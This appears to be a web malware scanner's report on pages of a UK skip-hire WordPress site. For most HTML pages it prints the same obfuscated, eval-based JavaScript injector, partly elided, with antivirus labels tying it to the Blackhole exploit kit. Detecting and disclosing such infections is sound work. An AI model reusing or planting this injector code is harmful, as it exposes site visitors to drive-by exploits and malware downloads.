Request | Server response | Status |
http://skiphirewatford.org.uk/ | 200 OK Content-Length: 29618 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) nzr="s"+"p"+"l"+"i"+"t";ecnxl=window;ubcyq=document;erqtg="0"+"x";gfjju=(5-3-1);try{++(ubcyq.body)}catch(emjql){jvkjkp=false;try{}catch(bpn){jvkjkp=21;}if(1){sau="17:5d:6c:65:5a:6b:60:66:65:17:5e:6d:71:6b:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5e:6d:71:6b:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:5
... 3531 bytes are skipped ...5:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5e:6d:71:6b:66:27:30:1f:20:32:4:1:74:4:1:74"[nzr](":");}ecnxl=sau;daunq=[];for(kzwi=22-20-2;-kzwi+1425!=0;kzwi+=1){qnbc=kzwi;if((0x19==031))daunq+=String.fromCharCode(eval(erqtg+ecnxl[1*qnbc])+0xa-gfjju);}fzat=eval;fzat(daunq)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.KU (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://skiphirewatford.org.uk/wp-content/themes/hmtpro5/adscript.js | 200 OK Content-Length: 176 Content-Type: application/javascript | clean |
http://skiphirewatford.org.uk/wp-includes/js/comment-reply.js?ver=3.4.1 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://skiphirewatford.org.uk/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://skiphirewatford.org.uk/wp-includes/js/jquery/jquery.form.js?ver=2.73 | 200 OK Content-Length: 11116 Content-Type: application/javascript | clean |
http://skiphirewatford.org.uk/wp-content/plugins/contact-form-7/scripts.js?ver=2.2 | 200 OK Content-Length: 4442 Content-Type: application/javascript | clean |
http://skiphirewatford.org.uk/about/ | 200 OK Content-Length: 27955 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) nzr="s"+"p"+"l"+"i"+"t";ecnxl=window;ubcyq=document;erqtg="0"+"x";gfjju=(5-3-1);try{++(ubcyq.body)}catch(emjql){jvkjkp=false;try{}catch(bpn){jvkjkp=21;}if(1){sau="17:5d:6c:65:5a:6b:60:66:65:17:5e:6d:71:6b:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5e:6d:71:6b:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:5
... 3531 bytes are skipped ...5:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5e:6d:71:6b:66:27:30:1f:20:32:4:1:74:4:1:74"[nzr](":");}ecnxl=sau;daunq=[];for(kzwi=22-20-2;-kzwi+1425!=0;kzwi+=1){qnbc=kzwi;if((0x19==031))daunq+=String.fromCharCode(eval(erqtg+ecnxl[1*qnbc])+0xa-gfjju);}fzat=eval;fzat(daunq)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.KU (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://skiphirewatford.org.uk/services/ | 200 OK Content-Length: 28352 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) nzr="s"+"p"+"l"+"i"+"t";ecnxl=window;ubcyq=document;erqtg="0"+"x";gfjju=(5-3-1);try{++(ubcyq.body)}catch(emjql){jvkjkp=false;try{}catch(bpn){jvkjkp=21;}if(1){sau="17:5d:6c:65:5a:6b:60:66:65:17:5e:6d:71:6b:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5e:6d:71:6b:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:5
... 3531 bytes are skipped ...5:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5e:6d:71:6b:66:27:30:1f:20:32:4:1:74:4:1:74"[nzr](":");}ecnxl=sau;daunq=[];for(kzwi=22-20-2;-kzwi+1425!=0;kzwi+=1){qnbc=kzwi;if((0x19==031))daunq+=String.fromCharCode(eval(erqtg+ecnxl[1*qnbc])+0xa-gfjju);}fzat=eval;fzat(daunq)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.KU (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://skiphirewatford.org.uk/privacy-policy/ | 200 OK Content-Length: 30229 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) nzr="s"+"p"+"l"+"i"+"t";ecnxl=window;ubcyq=document;erqtg="0"+"x";gfjju=(5-3-1);try{++(ubcyq.body)}catch(emjql){jvkjkp=false;try{}catch(bpn){jvkjkp=21;}if(1){sau="17:5d:6c:65:5a:6b:60:66:65:17:5e:6d:71:6b:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5e:6d:71:6b:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:5
... 3531 bytes are skipped ...5:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5e:6d:71:6b:66:27:30:1f:20:32:4:1:74:4:1:74"[nzr](":");}ecnxl=sau;daunq=[];for(kzwi=22-20-2;-kzwi+1425!=0;kzwi+=1){qnbc=kzwi;if((0x19==031))daunq+=String.fromCharCode(eval(erqtg+ecnxl[1*qnbc])+0xa-gfjju);}fzat=eval;fzat(daunq)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.KU (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://skiphirewatford.org.uk/contact-us/ | 200 OK Content-Length: 28755 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) nzr="s"+"p"+"l"+"i"+"t";ecnxl=window;ubcyq=document;erqtg="0"+"x";gfjju=(5-3-1);try{++(ubcyq.body)}catch(emjql){jvkjkp=false;try{}catch(bpn){jvkjkp=21;}if(1){sau="17:5d:6c:65:5a:6b:60:66:65:17:5e:6d:71:6b:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5e:6d:71:6b:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:5
... 3531 bytes are skipped ...5:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5e:6d:71:6b:66:27:30:1f:20:32:4:1:74:4:1:74"[nzr](":");}ecnxl=sau;daunq=[];for(kzwi=22-20-2;-kzwi+1425!=0;kzwi+=1){qnbc=kzwi;if((0x19==031))daunq+=String.fromCharCode(eval(erqtg+ecnxl[1*qnbc])+0xa-gfjju);}fzat=eval;fzat(daunq)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.KU (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://skiphirewatford.org.uk/skip-hire-rickmansworth/ | 200 OK Content-Length: 27951 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) nzr="s"+"p"+"l"+"i"+"t";ecnxl=window;ubcyq=document;erqtg="0"+"x";gfjju=(5-3-1);try{++(ubcyq.body)}catch(emjql){jvkjkp=false;try{}catch(bpn){jvkjkp=21;}if(1){sau="17:5d:6c:65:5a:6b:60:66:65:17:5e:6d:71:6b:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5e:6d:71:6b:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:5
... 3531 bytes are skipped ...5:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5e:6d:71:6b:66:27:30:1f:20:32:4:1:74:4:1:74"[nzr](":");}ecnxl=sau;daunq=[];for(kzwi=22-20-2;-kzwi+1425!=0;kzwi+=1){qnbc=kzwi;if((0x19==031))daunq+=String.fromCharCode(eval(erqtg+ecnxl[1*qnbc])+0xa-gfjju);}fzat=eval;fzat(daunq)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.KU (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://skiphirewatford.org.uk/skip-hire-kings-langley/ | 200 OK Content-Length: 27951 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) nzr="s"+"p"+"l"+"i"+"t";ecnxl=window;ubcyq=document;erqtg="0"+"x";gfjju=(5-3-1);try{++(ubcyq.body)}catch(emjql){jvkjkp=false;try{}catch(bpn){jvkjkp=21;}if(1){sau="17:5d:6c:65:5a:6b:60:66:65:17:5e:6d:71:6b:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5e:6d:71:6b:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:5
... 3531 bytes are skipped ...5:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5e:6d:71:6b:66:27:30:1f:20:32:4:1:74:4:1:74"[nzr](":");}ecnxl=sau;daunq=[];for(kzwi=22-20-2;-kzwi+1425!=0;kzwi+=1){qnbc=kzwi;if((0x19==031))daunq+=String.fromCharCode(eval(erqtg+ecnxl[1*qnbc])+0xa-gfjju);}fzat=eval;fzat(daunq)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.KU (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://skiphirewatford.org.uk/skip-hire-abbots-langley/ | 200 OK Content-Length: 27964 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) nzr="s"+"p"+"l"+"i"+"t";ecnxl=window;ubcyq=document;erqtg="0"+"x";gfjju=(5-3-1);try{++(ubcyq.body)}catch(emjql){jvkjkp=false;try{}catch(bpn){jvkjkp=21;}if(1){sau="17:5d:6c:65:5a:6b:60:66:65:17:5e:6d:71:6b:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5e:6d:71:6b:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:5
... 3531 bytes are skipped ...5:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5e:6d:71:6b:66:27:30:1f:20:32:4:1:74:4:1:74"[nzr](":");}ecnxl=sau;daunq=[];for(kzwi=22-20-2;-kzwi+1425!=0;kzwi+=1){qnbc=kzwi;if((0x19==031))daunq+=String.fromCharCode(eval(erqtg+ecnxl[1*qnbc])+0xa-gfjju);}fzat=eval;fzat(daunq)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.KU (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://skiphirewatford.org.uk/skip-hire-borehamwood/ | 200 OK Content-Length: 27925 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) nzr="s"+"p"+"l"+"i"+"t";ecnxl=window;ubcyq=document;erqtg="0"+"x";gfjju=(5-3-1);try{++(ubcyq.body)}catch(emjql){jvkjkp=false;try{}catch(bpn){jvkjkp=21;}if(1){sau="17:5d:6c:65:5a:6b:60:66:65:17:5e:6d:71:6b:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5e:6d:71:6b:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:5
... 3531 bytes are skipped ...5:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5e:6d:71:6b:66:27:30:1f:20:32:4:1:74:4:1:74"[nzr](":");}ecnxl=sau;daunq=[];for(kzwi=22-20-2;-kzwi+1425!=0;kzwi+=1){qnbc=kzwi;if((0x19==031))daunq+=String.fromCharCode(eval(erqtg+ecnxl[1*qnbc])+0xa-gfjju);}fzat=eval;fzat(daunq)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.KU (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|